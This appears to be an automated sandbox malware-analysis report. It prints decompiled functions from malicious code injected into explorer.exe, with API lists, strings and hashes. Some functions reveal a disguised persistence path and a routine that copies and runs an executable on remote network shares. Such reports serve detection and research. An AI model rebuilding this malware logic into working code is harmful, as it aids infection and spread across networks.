lstrlenA.KERNEL32(?,00000000), ref: 01517019
lstrlenA.KERNEL32(00000000), ref: 01517025
lstrcpyA.KERNEL32(00000000,?), ref: 01517076
lstrlenA.KERNEL32 ref: 01517082
lstrcpyA.KERNEL32(00000000,00000000), ref: 015170AA
lstrlenA.KERNEL32(00000000), ref: 015170B4

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID:
API String ID: 805584807-0
Opcode ID: 3cc9b9f8795ae52ebc99a6160186e81bad204663e03bb9cb7e8e49857d2a5137
Instruction ID: 178b0b86ca3ac783e0e06d8a9c2b8c113f74014ea28629c1929c46f38e7b4e0e
Opcode Fuzzy Hash: 3cc9b9f8795ae52ebc99a6160186e81bad204663e03bb9cb7e8e49857d2a5137
Instruction Fuzzy Hash: CE31E579900208EFDB15CFACCA84B9EBBF5FF48304F108899E915AB244D739AA44DF51

Uniqueness

Uniqueness Score: 0.04%

Function 003F4D50, Relevance: 7.6, APIs: 6, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E003F4D50(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				CHAR** _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t34;
				void* _t48;
				int _t50;

				_v8 =  &_a16;
				_v12 = 0;
				_v16 = 0;
				while( *_v8 != 0) {
					_t50 = lstrlenA( *_v8);
					_v12 = _t50 + lstrlenA(_a4);
					_v8 =  &(_v8[1]);
				}
				if(_a12 != 0) {
					_t48 = _a12 - 1;
					if(_v12 > _t48) {
						while(0 != 0) {
						}
						return _t48;
					}
				}
				_v16 = 0;
				_v8 =  &_a16;
				while(1) {
					_t34 = _v8;
					if( *_t34 == 0) {
						break;
					}
					lstrcpyA(_a8 + _v16,  *_v8);
					_v16 = lstrlenA( *_v8) + _v16;
					_v8 =  &(_v8[1]);
					if( *_v8 != 0) {
						lstrcpyA(_a8 + _v16, _a4);
						_v16 = lstrlenA(_a4) + _v16;
					}
				}
				return _t34;
			}

0x003f4d5a
0x003f4d5d
0x003f4d64
0x003f4d6b
0x003f4d79
0x003f4d8d
0x003f4d96
0x003f4d96
0x003f4d9f
0x003f4da4
0x003f4daa
0x003f4dac
0x003f4db0
0x00000000
0x003f4dac
0x003f4daa
0x003f4db4
0x003f4dbe
0x003f4dc1
0x003f4dc1
0x003f4dc7
0x00000000
0x00000000
0x003f4dd6
0x003f4deb
0x003f4df4
0x003f4dfd
0x003f4e0a
0x003f4e1d
0x003f4e1d
0x003f4e20
0x003f4e26

APIs

lstrlenA.KERNEL32(?), ref: 003F4D79
lstrlenA.KERNEL32(00000000), ref: 003F4D85
lstrcpyA.KERNEL32(00000000,?), ref: 003F4DD6
lstrlenA.KERNEL32 ref: 003F4DE2
lstrcpyA.KERNEL32(00000000,00000000), ref: 003F4E0A
lstrlenA.KERNEL32(00000000), ref: 003F4E14

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID:
API String ID: 805584807-0
Opcode ID: 1fdea93fcfbd34f76b3470a05ade83148876afb345e330358a0fefe9d09bf1d6
Instruction ID: 98955539e92cc89f219a098838209245de30c9b0d36df39104861aa4ae7e9345
Opcode Fuzzy Hash: 1fdea93fcfbd34f76b3470a05ade83148876afb345e330358a0fefe9d09bf1d6
Instruction Fuzzy Hash: E431D27590120CEFCB15DFA8D988AAEBBB5FF48305F2081A9E905A7351D734AA40DF94

Uniqueness

Uniqueness Score: 0.04%

Function 01504FFD, Relevance: 7.6, APIs: 5, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01504FFD(WCHAR* __eax, signed int __ebx, void* __ecx) {
				WCHAR* _v8;
				WCHAR* _v12;
				char _v16;
				WCHAR* _t20;
				char _t25;
				signed int _t37;
				WCHAR* _t44;
				WCHAR* _t45;

				_t37 = __ebx;
				_t20 = __eax;
				_t45 = 0;
				_t44 = __eax;
				_v8 = 0;
				_v16 = 0;
				if(__eax != 0) {
					_t20 = E01513960(__ecx, __ebx * 0x404);
					_v8 = _t20;
					if(_t20 != 0) {
						_v12 = 0;
						if(__ebx <= 0) {
							L8:
							_t25 = E0151C010(_v8, lstrlenW(_v8) + _t23);
							_v16 = _t25;
							if(_t25 != _t45) {
								E01515AF0(0x2c, _t25);
							}
							E01513990( &_v8, _t45);
							return E01513990( &_v16, _t45);
						}
						do {
							lstrcatW(_v8, _t44);
							lstrcatW(_v8, ":");
							lstrcatW(_v8,  &(_t44[0x100]));
							if(_v12 < _t37 - 1) {
								lstrcatW(_v8, ";");
							}
							_v12 = _v12 + 1;
							_t44 =  &(_t44[0x200]);
						} while (_v12 < _t37);
						_t45 = 0;
						goto L8;
					}
				}
				return _t20;
			}

0x01504ffd
0x01504ffd
0x01505004
0x01505007
0x01505009
0x0150500c
0x01505011
0x01505020
0x01505026
0x0150502b
0x01505031
0x01505036
0x0150507c
0x0150508b
0x01505092
0x01505097
0x0150509c
0x015050a2
0x015050a8
0x00000000
0x015050b7
0x0150503e
0x01505042
0x0150504c
0x01505058
0x01505060
0x0150506a
0x0150506a
0x0150506c
0x0150506f
0x01505075
0x0150507a
0x00000000
0x0150507a
0x0150502b
0x015050bd

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

lstrcatW.KERNEL32(?), ref: 01505042
lstrcatW.KERNEL32(?,0152A400), ref: 0150504C
lstrcatW.KERNEL32(?,?), ref: 01505058
lstrcatW.KERNEL32(?,0152A3F4), ref: 0150506A
lstrlenW.KERNEL32(?), ref: 0150507F

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$AllocHeaplstrlen
String ID:
API String ID: 2086708719-0
Opcode ID: 5ac096a2ee85e263c6ff54cb8bf8e9f0c7546f26df8dd4d62ea33f94cc46428b
Instruction ID: 38e5c25a7618873ee653884436a1b2e8e6e58c454690976ba6131b96aebd52c1
Opcode Fuzzy Hash: 5ac096a2ee85e263c6ff54cb8bf8e9f0c7546f26df8dd4d62ea33f94cc46428b
Instruction Fuzzy Hash: 24119D72D00129BBEB22EBA5DC4589EBFBDFB44760F204066E500EB194E7314B409B94

Uniqueness

Uniqueness Score: 1.18%

Function 01508BC1, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 70
stringUNIQUE

Download Yara Rule

C-Code - Quality: 85%

			E01508BC1(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				CHAR* _v12;
				char _v16;
				intOrPtr _v20;
				char _t22;
				CHAR* _t29;
				void* _t32;
				void* _t36;
				char _t38;
				void* _t41;

				_t38 = 0;
				_v8 = 0;
				if(E0151C270(_a4, lstrlenA(_a4)) != 0) {
					_t22 = E0151C070(_a4,  &_v16);
					_pop(_t36);
					_v8 = _t22;
					if(_t22 == 0) {
						goto L1;
					}
					if(_v16 == 0x100) {
						_v20 = 0x46;
						_t29 = E01513960(_t36, 0x47);
						_v12 = _t29;
						if(_t29 != 0) {
							_push(_a16);
							_push(_a12);
							E01513C30(_t29, 0x46, "%u&%s&%u", _a8);
							_t32 = E0150A7D8(_v8, _v12, lstrlenA(_v12));
							_t41 = _t41 + 0x24;
							if(_t32 > 0) {
								_t38 = 1;
							}
						}
					}
					E01513990( &_v8, 0);
					E01513990( &_v12, _v20);
					return _t38;
				}
				L1:
				return 0;
			}

0x01508bd2
0x01508bd4
0x01508be6
0x01508bf6
0x01508bfc
0x01508bfd
0x01508c02
0x00000000
0x00000000
0x01508c0b
0x01508c0f
0x01508c16
0x01508c1c
0x01508c21
0x01508c23
0x01508c26
0x01508c34
0x01508c48
0x01508c4d
0x01508c52
0x01508c56
0x01508c56
0x01508c52
0x01508c21
0x01508c5d
0x01508c69
0x00000000
0x01508c71
0x01508be8
0x00000000

APIs

lstrlenA.KERNEL32(?,readrr956964,00000000,?,?,?,00000000), ref: 01508BD7
lstrlenA.KERNEL32(?), ref: 01508C3F

Strings

readrr956964, xrefs: 01508BCE
%u&%s&%u, xrefs: 01508C2C
F, xrefs: 01508C0F

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %u&%s&%u$F$readrr956964
API String ID: 1659193697-2079271607
Opcode ID: 7c743524d23dd2218cfadd008ebd77fcf8011b0c9a3c26c5e564f5c69b65f1ee
Instruction ID: c72419cd20b09833919835da3f95a64a79400152c4cca87d46c2e0a7ebd19582
Opcode Fuzzy Hash: 7c743524d23dd2218cfadd008ebd77fcf8011b0c9a3c26c5e564f5c69b65f1ee
Instruction Fuzzy Hash: C211D6B2D0020ABAEF126FE9DC05EAE7BB9FF94310F000451F904EE190E7328650DB54

Uniqueness

Uniqueness Score: 100.00%

Function 01524A60, Relevance: 7.6, APIs: 5, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01524A60(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed int _t11;
				char** _t19;
				char _t22;
				void* _t24;
				long long _t34;
				long long _t35;

				_t9 = __eax;
				L015290EA();
				_t22 =  *__eax;
				_t19 = _a4;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					_t24 = _t24 + 8;
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L015290CC();
				 *_t9 = 0;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t34 = st0;
				asm("fucomp st2");
				asm("fnstsw ax");
				st1 = _t34;
				if((_t11 & 0x00000044) != 0) {
					st1 = _t34;
					goto L7;
				} else {
					asm("fchs");
					_t35 = st1;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L10:
						 *_a8 = _t35;
						return 0;
					} else {
						L7:
						st0 = _t34;
						L015290CC();
						if( *_t11 != 0x22) {
							_t35 = _v16;
							goto L10;
						} else {
							return _t11 | 0xffffffff;
						}
					}
				}
			}

0x01524a60
0x01524a68
0x01524a6d
0x01524a72
0x01524a75
0x01524a7c
0x01524a81
0x01524a86
0x01524a8a
0x01524a8a
0x01524a86
0x01524a8c
0x01524a94
0x01524a9e
0x01524aa3
0x01524ab2
0x01524ab5
0x01524ab7
0x01524ab9
0x01524abe
0x01524acf
0x00000000
0x01524ac0
0x01524ac0
0x01524ac2
0x01524ac4
0x01524ac6
0x01524acb
0x01524ae7
0x01524aea
0x01524af1
0x01524acd
0x01524ad1
0x01524ad1
0x01524ad3
0x01524adb
0x01524ae4
0x00000000
0x01524add
0x01524ae3
0x01524ae3
0x01524adb
0x01524acb

APIs

localeconv.MSVCRT(00000000,?,01522935,?,?,?,?,?,01523125,?,01522A81,00000000), ref: 01524A68
strchr.MSVCRT(00000000,0000002E,00000000,?,01522935,?,?,?,?,?,01523125,?,01522A81,00000000), ref: 01524A7C
_errno.MSVCRT(00000000,?,01522935,?,?,?,?,?,01523125,?,01522A81,00000000), ref: 01524A8C
strtod.MSVCRT(00000000,?,00000000,?,01522935,?,?,?,?,?,01523125,?,01522A81,00000000), ref: 01524A9E
_errno.MSVCRT(01522935,?,?,?,?,?,01523125,?,01522A81,00000000,?,?,?,?,00000000), ref: 01524AD3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: a445b1372ad7fc34bb25c9b920da3b2832b6719de74f832e485f654bf58230f8
Instruction ID: 7c920ef475fc9db72668c3234ad4049bdc9585763e32fd0e42801df47fd44ede
Opcode Fuzzy Hash: a445b1372ad7fc34bb25c9b920da3b2832b6719de74f832e485f654bf58230f8
Instruction Fuzzy Hash: 0011E573E0012AA6CB226AA4D8417993FA8FF8B350F2449C5D9985F3C0EB755914CBE5

Uniqueness

Uniqueness Score: 12.89%

Function 01510DCA, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01510DCA(void* _a4, void* _a8) {
				void* _t4;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t21;

				_t17 = _a4;
				if(_t17 == 0) {
					_push("crypto\\digest\\hmac.c");
					_push("psAssert %s");
					_t13 = E01510CBC(_t4);
					_push(0xd2);
					_push(":%d ");
					E01510CBC(_t13);
					E01510B84("ctx != NULL");
					_t21 = _t21 + 0x14;
				}
				_t16 = _a8;
				if(_a8 != 0) {
					_t19 = _t17 + 0x80;
					E015129C5(_t17 + 0x80, _t16);
					E015128AA(_t19);
					E01512911(_t19, _t17, 0x40);
					E01512911(_t19, _t16, 0x14);
					E015129C5(_t19, _t16);
					memset(_t17, 0, 0x80);
					_t11 = 0x14;
					return _t11;
				} else {
					_t12 = 0xfffffffa;
					return _t12;
				}
			}

0x01510dcf
0x01510dd4
0x01510dd6
0x01510ddb
0x01510de0
0x01510de5
0x01510dea
0x01510def
0x01510df9
0x01510dfe
0x01510dfe
0x01510e01
0x01510e06
0x01510e0e
0x01510e16
0x01510e1c
0x01510e25
0x01510e2e
0x01510e35
0x01510e42
0x01510e4c
0x00000000
0x01510e08
0x01510e0a
0x00000000
0x01510e0a

APIs

Part of subcall function 015129C5: memset.MSVCRT(?,00000000,000000D0,?,?,?,?,01510E1B,?,?), ref: 01512AC2

Part of subcall function 01512911: memcpy.MSVCRT(?,00000000,?,?,?,?,?,01510D40,?,?,00000040,?), ref: 01512991

memset.MSVCRT(?,00000000,00000080,?,?,?,?,00000014,?,?,00000040,?,?,?), ref: 01510E42

Strings

psAssert %s, xrefs: 01510DDB
ctx != NULL, xrefs: 01510DF4
:%d , xrefs: 01510DEA
crypto\digest\hmac.c, xrefs: 01510DD6

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset$memcpy
String ID: :%d $crypto\digest\hmac.c$ctx != NULL$psAssert %s
API String ID: 368790112-2384243449
Opcode ID: 6f53c372f1b565ff715d660181f0e8ae0ef9748e5a830d7537d02d631112dcd3
Instruction ID: 0b7b00bd8b9c16792a34660c2d7d86fb94878540c2d3a21ae5fff6068aa9f8cf
Opcode Fuzzy Hash: 6f53c372f1b565ff715d660181f0e8ae0ef9748e5a830d7537d02d631112dcd3
Instruction Fuzzy Hash: FEF0A47238571B39F813365A5C82F9F631DBFE6AA4F200519FA087E0C99A945A8141F5

Uniqueness

Uniqueness Score: 12.89%

Function 0151D630, Relevance: 7.5, APIs: 5, Instructions: 40
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E0151D630(void* __ecx, long _a4) {
				void* _v8;

				if(OpenThreadToken(GetCurrentThread(), _a4, 0,  &_v8) != 0) {
					L10:
					return _v8;
				}
				if(GetLastError() != 0x3f0) {
					while(0 != 0) {
					}
					return 0;
				}
				if(OpenProcessToken(GetCurrentProcess(), _a4,  &_v8) != 0) {
					goto L10;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0151d64d
0x0151d68b
0x00000000
0x0151d68b
0x0151d65a
0x0151d681
0x0151d685
0x00000000
0x0151d687
0x0151d673
0x00000000
0x0151d67f
0x0151d675
0x0151d679
0x00000000

APIs

GetCurrentThread.KERNEL32(0151D843,00000000,00000008,?,?,0151D843,00000008), ref: 0151D63E
OpenThreadToken.ADVAPI32(00000000,?,?,0151D843,00000008), ref: 0151D645
GetLastError.KERNEL32(?,?,0151D843,00000008), ref: 0151D64F
GetCurrentProcess.KERNEL32(0151D843,00000008,?,?,0151D843,00000008), ref: 0151D664
OpenProcessToken.ADVAPI32(00000000,?,?,0151D843,00000008), ref: 0151D66B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentOpenProcessThreadToken$ErrorLast
String ID:
API String ID: 102224034-0
Opcode ID: ac9525de52eea756b58eff39918df1c4c95bb356b7b07423f302fc4053717c91
Instruction ID: b71e43b089bb8976c598c2de36dabbb2258a905e8452e257b16c798caf7a7f77
Opcode Fuzzy Hash: ac9525de52eea756b58eff39918df1c4c95bb356b7b07423f302fc4053717c91
Instruction Fuzzy Hash: F7F06276604208EBEB26DEF8C90CA6E37BCFB05240B024D54F51ECF409E63996086750

Uniqueness

Uniqueness Score: 0.81%

Function 003F7230, Relevance: 7.5, APIs: 5, Instructions: 40
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E003F7230(void* __ecx, long _a4) {
				void* _v8;

				if(OpenThreadToken(GetCurrentThread(), _a4, 0,  &_v8) != 0) {
					L10:
					return _v8;
				}
				if(GetLastError() != 0x3f0) {
					while(0 != 0) {
					}
					return 0;
				}
				if(OpenProcessToken(GetCurrentProcess(), _a4,  &_v8) != 0) {
					goto L10;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f724d
0x003f728b
0x00000000
0x003f728b
0x003f725a
0x003f7281
0x003f7285
0x00000000
0x003f7287
0x003f7273
0x00000000
0x003f727f
0x003f7275
0x003f7279
0x00000000

APIs

GetCurrentThread.KERNEL32(003F7583,00000000,00000008,?,?,003F7583,00000008), ref: 003F723E
OpenThreadToken.ADVAPI32(00000000,?,?,003F7583,00000008), ref: 003F7245
GetLastError.KERNEL32(?,?,003F7583,00000008), ref: 003F724F
GetCurrentProcess.KERNEL32(003F7583,00000008,?,?,003F7583,00000008), ref: 003F7264
OpenProcessToken.ADVAPI32(00000000,?,?,003F7583,00000008), ref: 003F726B

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentOpenProcessThreadToken$ErrorLast
String ID:
API String ID: 102224034-0
Opcode ID: 0d04e4eddc53efe643253803a620d5e6f0bac25cde619230682b39b3a027fa33
Instruction ID: d385871a8f3dbb383849b3d3232b7f37d12cc42ccf0ff754dca5373ffd7da973
Opcode Fuzzy Hash: 0d04e4eddc53efe643253803a620d5e6f0bac25cde619230682b39b3a027fa33
Instruction Fuzzy Hash: 84F04F31A0810CBBCF51DBB0DF08ABF366CEB48340B100D2AFB06D6850D632DA009A95

Uniqueness

Uniqueness Score: 0.81%

Function 01504715, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171
UNIQUE

Download Yara Rule

C-Code - Quality: 89%

			E01504715(void* __ebx, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v80;
				char _v144;
				char _v664;
				void* __edi;
				intOrPtr _t48;
				signed int _t63;
				signed int _t66;
				char _t67;
				signed int _t72;
				signed int _t75;
				signed int _t80;
				char _t82;
				signed int _t83;
				intOrPtr _t84;
				void* _t87;
				void* _t88;
				signed int _t90;
				void* _t92;
				signed int _t99;
				void* _t102;
				void* _t103;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				_t48 = E015045A5(0, __fp0,  &_v20);
				_pop(_t92);
				_v40 = _t48;
				if(_t48 != 0) {
					_v28 = E0151C990(_t48, _v20, 0);
					_v12 = E01515B10(_t92, __eflags, 0xf);
					_t99 = E0151BD40( &_v16);
					_t103 = _t102 + 0x14;
					__eflags = _t99;
					if(_t99 == 0) {
						L14:
						__eflags = _v8;
						if(_v8 != 0) {
							E01513D60(_t92,  &_v144, 0x1538b44, 0x40);
							lstrcatA( &_v144, 0x152a378);
							E0151CF00(__eflags,  &_v80,  &_v144);
							E01513BA0(_t92,  &_v144, 0, 0x40);
							_push( &_v80);
							_t63 = E0151CDF3(_t92);
							__eflags = _t63;
							if(_t63 <= 0) {
								_t67 = E01515230(_t92, 0x2a80);
								_push(_v8);
								_v32 = _t67;
								E01513CA0( &_v664, 0x104, _t67, "C:\Windows");
								E01515460( &_v32);
								_t72 = E01515350(_t92, 0x272f);
								_v36 = _t72;
								__eflags = _t72;
								if(__eflags != 0) {
									_t75 = E01504504(_t92, __eflags,  &_v80,  &_v664, _t72);
									__eflags = _t75;
									if(_t75 == 0) {
										E01515AF0(0xf, _v12);
										E01515C00(_t92, 0, 0x1538b44);
									}
									E01515460( &_v36);
								}
							}
							E01513990( &_v8, 0xfffffffe);
							_t66 = 0;
							__eflags = 0;
						} else {
							_t80 = _v16;
							__eflags = _v24 - _t80;
							if(_v24 == _t80) {
								E01515AF0(0xf, _v12);
								_t80 = E01515C00(_t92, 0, "jkfkdm");
							}
							_t66 = _t80 | 0xffffffff;
						}
						return _t66;
					}
					_t90 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L13:
						goto L14;
					} else {
						goto L4;
					}
					do {
						L4:
						_t82 = E015046BE(_t92,  *((intOrPtr*)(_t99 + _t90 * 4)));
						_pop(_t92);
						_v8 = _t82;
						__eflags = _t82;
						if(_t82 == 0) {
							goto L12;
						}
						_t83 = E01518F40(_t92, _t82);
						_pop(_t92);
						__eflags = _t83;
						if(_t83 == 0) {
							L7:
							__eflags = _v12;
							if(_v12 == 0) {
								L10:
								_t84 = E01519110(_t92, _v8, _v40, _v20);
								_t103 = _t103 + 0xc;
								__eflags = _t84;
								if(_t84 >= 0) {
									goto L13;
								}
								E01513990( &_v8, 0xfffffffe);
								_t24 =  &_v24;
								 *_t24 = _v24 + 1;
								__eflags =  *_t24;
								_pop(_t92);
								goto L12;
							}
							__eflags = _t83;
							if(__eflags != 0) {
								goto L10;
							}
							_t87 = E01513E60(__eflags, _v12);
							_pop(_t92);
							__eflags = _v28 - _t87;
							if(_v28 == _t87) {
								goto L12;
							}
							goto L10;
						}
						__eflags = _v28 - _t83;
						if(_v28 == _t83) {
							goto L13;
						}
						goto L7;
						L12:
						_t90 = _t90 + 1;
						__eflags = _t90 - _v16;
					} while (_t90 < _v16);
					goto L13;
				}
				_t88 = 0xfffffffe;
				return _t88;
			}

0x01504725
0x01504728
0x0150472b
0x0150472e
0x01504731
0x01504734
0x01504739
0x0150473a
0x0150473f
0x01504756
0x0150475e
0x0150476a
0x0150476c
0x0150476f
0x01504771
0x015047de
0x015047de
0x015047e1
0x0150481a
0x0150482e
0x0150483f
0x0150484e
0x01504856
0x01504857
0x0150485f
0x01504861
0x01504868
0x0150486d
0x01504870
0x01504885
0x0150488e
0x01504898
0x015048a0
0x015048a3
0x015048a5
0x015048b3
0x015048bb
0x015048bd
0x015048c4
0x015048cb
0x015048d0
0x015048d7
0x015048dc
0x015048a5
0x015048e3
0x015048ea
0x015048ea
0x015047e3
0x015047e3
0x015047e6
0x015047e9
0x015047f0
0x015047fb
0x01504800
0x01504803
0x01504803
0x00000000
0x015048ec
0x01504774
0x01504776
0x01504779
0x015047dd
0x00000000
0x00000000
0x00000000
0x00000000
0x0150477b
0x0150477b
0x0150477e
0x01504783
0x01504784
0x01504787
0x01504789
0x00000000
0x00000000
0x0150478c
0x01504791
0x01504792
0x01504794
0x0150479b
0x0150479b
0x0150479e
0x015047b2
0x015047bb
0x015047c0
0x015047c3
0x015047c5
0x00000000
0x00000000
0x015047cd
0x015047d2
0x015047d2
0x015047d2
0x015047d6
0x00000000
0x015047d6
0x015047a0
0x015047a2
0x00000000
0x00000000
0x015047a7
0x015047ac
0x015047ad
0x015047b0
0x00000000
0x00000000
0x00000000
0x015047b0
0x01504796
0x01504799
0x00000000
0x00000000
0x00000000
0x015047d7
0x015047d7
0x015047d8
0x015047d8
0x00000000
0x0150477b
0x01504743
0x00000000

Strings

jkfkdm, xrefs: 015047F5, 0150480D, 01504818, 015048C9
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 01504749
C:\Windows, xrefs: 01504873

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$C:\Windows$jkfkdm
API String ID: 0-3109258196
Opcode ID: 5b8b1b0f75ebbfd7f1ee44134319ab07522f117261c04eef50b4e6e663954f0d
Instruction ID: 2d2ba5041cba87c4cd1d0a5a4707b98a0acb04575f5c3530897588b8bd1dc4e3
Opcode Fuzzy Hash: 5b8b1b0f75ebbfd7f1ee44134319ab07522f117261c04eef50b4e6e663954f0d
Instruction Fuzzy Hash: CA519672D0021BAAEF13EBE48C44DEEB7B8BF95214F100566E615FA184FA355651CB60

Uniqueness

Uniqueness Score: 100.00%

Function 01507DFD, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101
UNIQUE

Download Yara Rule

C-Code - Quality: 67%

			E01507DFD(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v24;
				short _v1048;
				char _v2072;
				signed int _t31;
				void* _t35;
				void* _t40;
				void* _t42;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t59;

				_t59 = __edi;
				_v8 = _v8 & 0x00000000;
				E015169C0(__eflags,  &_v24, 6, 0xa, 0x15394fc);
				_t31 = E01516D40( &_v24);
				_v8 = _t31;
				if(_t31 != 0) {
					_push(_a12);
					E01513CA0( &_v2072, 0x1ff, L"\\\\%s\\%s", _a8);
					_t35 = E01507BF0( &_v2072, _a16, _a20);
					__eflags = _t35;
					if(_t35 == 0) {
						_push(_v8);
						E01513CA0( &_v1048, 0x1ff, L"%s\\%s.exe",  &_v2072);
						_t16 = _t59 + 0x628; // 0xe87d83
						_t40 = E0151FC80( *_t16,  &_v1048);
						__eflags = _t40;
						if(_t40 >= 0) {
							Sleep(0x1388);
							_t42 = E0151BCE0(_t55,  &_v1048);
							__eflags = _t42;
							if(_t42 == 0) {
								goto L6;
							} else {
								_push( &_v1048);
								_push(__edi);
								 *((intOrPtr*)(__edi + 0x624))();
								_t22 = _t59 + 0x62c; // 0x9755959
								_t51 = E01507D4D(_a4, _a8,  &_v1048,  *_t22, _v8);
								__eflags = _t51;
								if(_t51 != 0) {
									__eflags = 0;
								} else {
									DeleteFileW( &_v1048);
									_push(5);
									goto L4;
								}
							}
						} else {
							L6:
							_push(3);
							goto L4;
						}
					} else {
						_push(2);
						L4:
						_pop(0);
					}
					 *0x15379f0( &_v2072, 0, 1);
					E01513990( &_v8, 0);
					return 0;
				} else {
					_t54 = 0xa;
					return _t54;
				}
			}

0x01507dfd
0x01507e06
0x01507e17
0x01507e20
0x01507e28
0x01507e2d
0x01507e35
0x01507e4d
0x01507e5f
0x01507e67
0x01507e69
0x01507e73
0x01507e8a
0x01507e96
0x01507e9c
0x01507ea4
0x01507ea6
0x01507eb1
0x01507ebe
0x01507ec4
0x01507ec6
0x00000000
0x01507ec8
0x01507ece
0x01507ecf
0x01507ed0
0x01507edf
0x01507eec
0x01507ef4
0x01507ef6
0x01507f0c
0x01507ef8
0x01507eff
0x01507f05
0x00000000
0x01507f05
0x01507ef6
0x01507ea8
0x01507ea8
0x01507ea8
0x00000000
0x01507ea8
0x01507e6b
0x01507e6b
0x01507e6d
0x01507e6d
0x01507e6d
0x01507f19
0x01507f25
0x01507f30
0x01507e2f
0x01507e31
0x01507e33
0x01507e33

Strings

\\%s\%s, xrefs: 01507E46
%s\%s.exe, xrefs: 01507E7D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s\%s.exe$\\%s\%s
API String ID: 1659193697-2512912194
Opcode ID: 230f3dfe6ab73113a7f2a7e779256111a8639b91e3a3d01a1a909e4094619520
Instruction ID: 05d6a4c4e7fb2a7ba5325305fd950b62cb300f31da9338bb55e577b3fc180b3b
Opcode Fuzzy Hash: 230f3dfe6ab73113a7f2a7e779256111a8639b91e3a3d01a1a909e4094619520
Instruction Fuzzy Hash: F9317472A0021FBADF229BA0DD05FDA77ADBF48354F0040A1F604EA081E771EA549BA1

Uniqueness

Uniqueness Score: 100.00%

Function 003FAE50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
UNIQUE

Download Yara Rule

C-Code - Quality: 23%

			E003FAE50() {
				char _v264;
				void _v300;
				void* _v304;
				int _v308;
				intOrPtr _v312;
				signed int _v316;
				char _v320;
				char _t41;
				void* _t42;
				void* _t55;
